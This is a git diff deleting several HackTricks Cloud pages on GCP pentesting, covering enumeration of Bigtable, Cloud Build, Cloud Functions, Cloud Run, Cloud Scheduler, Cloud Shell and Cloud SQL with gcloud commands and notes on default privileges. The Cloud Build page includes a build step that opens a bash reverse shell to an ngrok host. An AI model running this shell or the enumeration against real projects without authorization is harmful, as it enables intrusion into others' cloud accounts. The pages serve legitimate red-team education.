-{% endhint %} - -## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) - -A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable). - -```bash -# Cloud Bigtable -gcloud bigtable instances list -gcloud bigtable instances describe -gcloud bigtable instances get-iam-policy - -## Clusters -gcloud bigtable clusters list -gcloud bigtable clusters describe - -## Backups -gcloud bigtable backups list --instance -gcloud bigtable backups describe --instance -gcloud bigtable backups get-iam-policy --instance - -## Hot Tables -gcloud bigtable hot-tablets list - -## App Profiles -gcloud bigtable app-profiles list --instance -gcloud bigtable app-profiles describe --instance -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md deleted file mode 100644 index 18aef35d1..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md +++ /dev/null @@ -1,199 +0,0 @@ -# GCP - Cloud Build Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Build is a managed CI/CD platform that **automates software build** and release processes, integrating with **source code repositories** and supporting a wide range of programming languages. It **allows developers to build, test, and deploy code automatically** while providing flexibility to customize build steps and workflows. - -Each Cloud Build Trigger is **related to a Cloud Repository or directly connected with an external repository** (Github, Bitbucket and Gitlab). - -{% hint style="success" %} -I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a [https://source.cloud.google.com/](https://source.cloud.google.com/) URL and Github is not accessed by the client. -{% endhint %} - -### Events - -The Cloud Build can be triggered if: - -* **Push to a branch**: Specify the branch -* **Push a new tag**: Specify the tag -* P**ull request**: Specify the branch that receives the PR -* **Manual Invocation** -* **Pub/Sub message:** Specify the topic -* **Webhook event**: Will expose a HTTPS URL and the request must be authenticated with a secret - -### Execution - -There are 3 options: - -* A yaml/json **specifying the commands** to execute. Usually: `/cloudbuild.yaml` - * Only one that can be specified “inline” in the web console and in the cli - * Most common option - * Relevant for unauthenticated access -* A **Dockerfile** to build -* A **Buildpack** to build - -### SA Permissions - -The **Service Account has the `cloud-platform` scope**, so it can **use all the privileges.** If **no SA is specified** (like when doing submit) the **default SA** `@cloudbuild.gserviceaccount.com` will be **used.** - -By default no permissions are given but it's fairly easy to give it some: - -
- -### Approvals - -It's possible to config a Cloud Build to **require approvals for build executions** (disabled by default). - -### PR Approvals - -When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`. - -
- -### Connections & Repositories - -Connections can be created over: - -* **GitHub:** It will show an OAuth prompt asking for permissions to **get a Github token** that will be stored inside the **Secret Manager.** -* **GitHub Enterprise:** It will ask to install a **GithubApp**. An **authentication token** from your GitHub Enterprise host will be created and stored in this project as a S**ecret Manager** secret. -* **GitLab / Enterprise:** You need to **provide the API access token and the Read API access toke**n which will stored in the **Secret Manager.** - -Once a connection is generated, you can use it to **link repositories that the Github account has access** to. - -This option is available through the button: - -
- -{% hint style="success" %} -Note that repositories connected with this method are **only available in Triggers using 2nd generation.** -{% endhint %} - -### Connect a Repository - -This is not the same as a **`connection`**. This allows **different** ways to get **access to a Github or Bitbucket** repository but **doesn't generate a connection object, but it does generate a repository object (of 1st generation).** - -This option is available through the button: - -
- -### Storage - -Sometimes Cloud Build will **generate a new storage to store the files for the trigger**. This happens for example in the example that GCP offers with: - -```bash -git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \ - cd cloud-console-sample-build && \ - gcloud builds submit --config cloudbuild.yaml --region=global -``` - -A Storage bucket called [security-devbox\_cloudbuild](https://console.cloud.google.com/storage/browser/security-devbox_cloudbuild;tab=objects?forceOnBucketsSortingFiltering=false\&project=security-devbox) is created to store a `.tgz` with the files to be used. - -### Get shell - -```yaml -steps: - - name: bash - script: | - #!/usr/bin/env bash - bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1 -options: - logging: CLOUD_LOGGING_ONLY -``` - -Install gcloud inside cloud build: - -```bash -# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image -curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz -mkdir -p /usr/local/gcloud -tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz -/usr/local/gcloud/google-cloud-sdk/install.sh -``` - -### Enumeration - -You could find **sensitive info in build configs and logs**. - -```bash -# Get configured triggers configurations -gcloud builds triggers list # Check for the words github and bitbucket -gcloud builds triggers describe - -# Get build executions -gcloud builds list -gcloud builds describe # Get even the build yaml if defined in there -gcloud builds log # Get build logs - -# List all connections of each region -regions=("${(@f)$(gcloud compute regions list --format='value(name)')}") -for region in $regions; do - echo "Listing build connections in region: $region" - connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}") - if [[ ${#connections[@]} -eq 0 ]]; then - echo "No connections found in region $region." 
- else - for connection in $connections; do - echo "Describing connection $connection in region $region" - gcloud builds connections describe "$connection" --region="$region" - echo "-----------------------------------------" - done - fi - echo "=========================================" -done - -# List all worker-pools -regions=("${(@f)$(gcloud compute regions list --format='value(name)')}") -for region in $regions; do - echo "Listing build worker-pools in region: $region" - gcloud builds worker-pools list --region="$region" - echo "-----------------------------------------" -done -``` - -### Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudbuild-privesc.md" %} -[gcp-cloudbuild-privesc.md](../gcp-privilege-escalation/gcp-cloudbuild-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md" %} -[gcp-cloud-build-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md" %} -[gcp-cloud-build-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md deleted file mode 100644 index f12757734..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md +++ /dev/null @@ -1,135 +0,0 @@ -# GCP - Cloud Functions Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -[Google Cloud Functions](https://cloud.google.com/functions/) are designed to host your code, which **gets executed in response to events**, without necessitating the management of a host operating system. Additionally, these functions support the storage of environment variables, which the code can utilize. - -### Storage - -The Cloud Functions **code is stored in GCP Storage**. Therefore, anyone with **read access over buckets** in GCP is going to be able to **read the Cloud Functions code**.\ -The code is stored in a bucket like one of the following: - -* `gcf-sources--/-/version-/function-source.zip` -* `gcf-v2-sources--/function-source.zip` - -For example:\ -`gcf-sources-645468741258-us-central1/function-1-003dcbdf-32e1-430f-a5ff-785a6e238c76/version-4/function-source.zip` - -{% hint style="warning" %} -Any user with **read privileges over the bucket** storing the Cloud Function could **read the executed code**. -{% endhint %} - -### Artifact Registry - -If the cloud function is configured so the executed Docker container is stored inside and Artifact Registry repo inside the project, anyway with read access over the repo will be able to download the image and check the source code. For more info check: - -{% content-ref url="gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### SA - -If not specified, by default the **App Engine Default Service Account** with **Editor permissions** over the project will be attached to the Cloud Function. - -### Triggers, URL & Authentication - -When a Cloud Function is created the **trigger** needs to be specified. One common one is **HTTPS**, this will **create an URL where the function** can be triggered via web browsing.\ -Other triggers are pub/sub, Storage, Filestore... 
- -The URL format is **`https://-.cloudfunctions.net/`** - -When the HTTPS tigger is used, it's also indicated if the **caller needs to have IAM authorization** to call the Function or if **everyone** can just call it: - -
- -### Inside the Cloud Function - -The code is **downloaded inside** the folder **`/workspace`** with the same file names as the ones the files have in the Cloud Function and is executed with the user `www-data`.\ -The disk **isn't mounted as read-only.** - -### Enumeration - -```bash -# List functions -gcloud functions list -gcloud functions describe # Check triggers to see how is this function invoked -gcloud functions get-iam-policy - -# Get logs of previous runs. By default, limits to 10 lines -gcloud functions logs read --limit [NUMBER] - -# Call a function -curl https://-.cloudfunctions.net/ -gcloud functions call --data='{"message": "Hello World!"}' - -# If you know the name of projects you could try to BF cloud functions names - -# Get events that could be used to trigger a cloud function -gcloud functions event-types list - -# Access function with authentication -curl -X POST https://-.cloudfunctions.net/ \ --H "Authorization: bearer $(gcloud auth print-identity-token)" \ --H "Content-Type: application/json" \ --d '{}' -``` - -### Privilege Escalation - -In the following page, you can check how to **abuse cloud function permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md" %} -[gcp-cloudfunctions-privesc.md](../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md" %} -[gcp-cloud-functions-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md" %} -[gcp-cloud-functions-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref 
url="../gcp-persistence/gcp-cloud-functions-persistence.md" %} -[gcp-cloud-functions-persistence.md](../gcp-persistence/gcp-cloud-functions-persistence.md) -{% endcontent-ref %} - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md deleted file mode 100644 index 82989eafc..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md +++ /dev/null @@ -1,137 +0,0 @@ -# GCP - Cloud Run Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -Cloud Run is a serverless managed compute platform that lets you **run containers** directly on top of Google's scalable infrastructure. - -You can run your container or If you're using Go, Node.js, Python, Java, .NET Core, or Ruby, you can use the [source-based deployment](https://cloud.google.com/run/docs/deploying-source-code) option that **builds the container for you.** - -Google has built Cloud Run to **work well together with other services on Google Cloud**, so you can build full-featured applications. - -### Services and jobs - -On Cloud Run, your code can either run continuously as a _**service**_ or as a _**job**_. Both services and jobs run in the same environment and can use the same integrations with other services on Google Cloud. - -* **Cloud Run services.** Used to run code that responds to web requests, or events. -* **Cloud Run jobs.** Used to run code that performs work (a job) and quits when the work is done. - -## Cloud Run Service - -Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080 inside the container by default, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response. - -### Relevant details - -* By **default**, the **access** to the web server is **public**, but it can also be **limited to internal traffic** (VPC...)\ - Moreover, the **authentication** to contact the web server can be **allowing all** or to **require authentication via IAM**. -* By default, the **encryption** uses a **Google managed key**, but a **CMEK** (Customer Managed Encryption Key) from **KMS** can also be **chosen**. 
-* By **default**, the **service account** used is the **Compute Engine default one** which has **Editor** access over the project and it has the **scope `cloud-platform`.** -* It's possible to define **clear-text environment variables** for the execution, and even **mount cloud secrets** or **add cloud secrets to environment variables.** -* It's also possible to **add connections with Cloud SQL** and **mount a file system.** -* The **URLs** of the services deployed are similar to **`https://-.a.run.app`** -* A Run Service can have **more than 1 version or revision**, and **split traffic** among several revisions. - -### Enumeration - -```bash -# List services -gcloud run services list -gcloud run services list --platform=managed -gcloud run services list --platform=gke - -# Get info of a service -gcloud run services describe --region - -# Get info of all the services together -gcloud run services list --format=yaml -gcloud run services list --platform=managed --format=json -gcloud run services list --platform=gke --format=json - -# Get policy -gcloud run services get-iam-policy --region - -# Get revisions -gcloud run revisions list --region -gcloud run revisions describe --region - -# Get domains -gcloud run domain-mappings list -gcloud run domain-mappings describe - -# Attempt to trigger a job unauthenticated -curl - -# Attempt to trigger a job with your current gcloud authorization -curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" -``` - -## Cloud Run Jobs - -Cloud Run jobs are be a better fit for **containers that run to completion and don't serve requests**. Jobs don't have the ability to serve requests or listen on a port. This means that unlike Cloud Run services, jobs should not bundle a web server. Instead, jobs containers should exit when they are done. 
- -### Enumeration - -```bash -gcloud beta run jobs list -gcloud beta run jobs describe --region -gcloud beta run jobs get-iam-policy --region -``` - -## Privilege Escalation - -In the following page, you can check how to **abuse cloud run permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-run-privesc.md" %} -[gcp-run-privesc.md](../gcp-privilege-escalation/gcp-run-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md" %} -[gcp-cloud-run-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md" %} -[gcp-cloud-run-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) -{% endcontent-ref %} - -## Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-run-persistence.md" %} -[gcp-cloud-run-persistence.md](../gcp-persistence/gcp-cloud-run-persistence.md) -{% endcontent-ref %} - -## References - -* [https://cloud.google.com/run/docs/overview/what-is-cloud-run](https://cloud.google.com/run/docs/overview/what-is-cloud-run) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md deleted file mode 100644 index 1614bc5d2..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md +++ /dev/null @@ -1,73 +0,0 @@ -# GCP - Cloud Scheduler Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**. - -Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code. - -At the moment of this writing these are the actions this service allows to schedule: - -
- -* **HTTP**: Send an HTTP request defining the headers and body of the request. -* **Pub/Sub**: Send a message into an specific topic -* **App Engine HTTP**: Send an HTTP request to an app built in App Engine -* **Workflows**: Call a GCP Workflow. - -## Service Accounts - -A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\ -Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request. - -{% hint style="danger" %} -Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page. -{% endhint %} - -Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`. - -## Enumeration - -```bash -# Get schedulers in a location -gcloud scheduler jobs list --location us-central1 - -# Get information of an specific scheduler -gcloud scheduler jobs describe --location us-central1 -``` - -## Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md" %} -[gcp-cloudscheduler-privesc.md](../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md deleted file mode 100644 index d03e8b288..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md +++ /dev/null @@ -1,54 +0,0 @@ -# GCP - Cloud Shell Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Shell is an interactive shell environment for Google Cloud Platform (GCP) that provides you with **command-line access to your GCP resources directly from your browser or shell**. It's a managed service provided by Google, and it comes with a **pre-installed set of tools**, making it easier to manage your GCP resources without having to install and configure these tools on your local machine.\ -Moreover, its offered at **no additional cost.** - -**Any user of the organization** (Workspace) is able to execute **`gcloud cloud-shell ssh`** and get access to his **cloudshell** environment. However, **Service Accounts can't**, even if they are owner of the organization. - -There **aren't** **permissions** assigned to this service, therefore the **aren't privilege escalation techniques**. Also there **isn't any kind of enumeration**. - -Note that Cloud Shell can be **easily disabled** for the organization. - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md" %} -[gcp-cloud-shell-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-shell-persistence.md" %} -[gcp-cloud-shell-persistence.md](../gcp-persistence/gcp-cloud-shell-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md deleted file mode 100644 index ee69ced5a..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Cloud SQL Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud SQL is a managed service that **simplifies setting up, maintaining, and administering relational databases** like MySQL, PostgreSQL, and SQL Server on Google Cloud Platform, removing the need to handle tasks like hardware provisioning, database setup, patching, and backups. - -Key features of Google Cloud SQL include: - -1. **Fully Managed**: Google Cloud SQL is a fully-managed service, meaning that Google handles database maintenance tasks like patching, updates, backups, and configuration. -2. **Scalability**: It provides the ability to scale your database's storage capacity and compute resources, often without downtime. -3. **High Availability**: Offers high availability configurations, ensuring your database services are reliable and can withstand zone or instance failures. -4. **Security**: Provides robust security features like data encryption, Identity and Access Management (IAM) controls, and network isolation using private IPs and VPC. -5. **Backups and Recovery**: Supports automatic backups and point-in-time recovery, helping you safeguard and restore your data. -6. **Integration**: Seamlessly integrates with other Google Cloud services, providing a comprehensive solution for building, deploying, and managing applications. -7. **Performance**: Offers performance metrics and diagnostics to monitor, troubleshoot, and improve database performance. - -### Password - -In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":** - -
- -It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default. - -**SQL Server** can be configured with **Active Directory Authentication**. - -### Zone Availability - -The database can be **available in 1 zone or in multiple**, of course, it's recommended to have important databases in multiple zones. - -### Encryption - -By default a Google-managed encryption key is used, but it's also **possible to select a Customer-managed encryption key (CMEK)**. - -### Connections - -* **Private IP**: Indicate the VPC network and the database will get an private IP inside the network -* **Public IP**: The database will get a public IP, but by default no-one will be able to connect - * **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database -* **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it** - -
- -### Data Protection - -* **Daily backups**: Perform automatic daily backups and indicate the number of backups you want to maintain. -* **Point-in-time recovery**: Allows you to recover data from a specific point in time, down to a fraction of a second. -* **Deletion Protection**: If enabled, the DB won't be able to be deleted until this feature is disabled - -### Enumeration - -```bash -# Get SQL instances -gcloud sql instances list -gcloud sql instances describe # get IPs, CACert, settings - -# Get database names inside an instance (like information_schema, sys...) -gcloud sql databases list --instance -gcloud sql databases describe --instance - -# Get usernames inside the db instance -gcloud sql users list --instance - -# Backups -gcloud sql backups list --instance -gcloud sql backups describe --instance -``` - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md" %} -[gcp-cloud-sql-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} 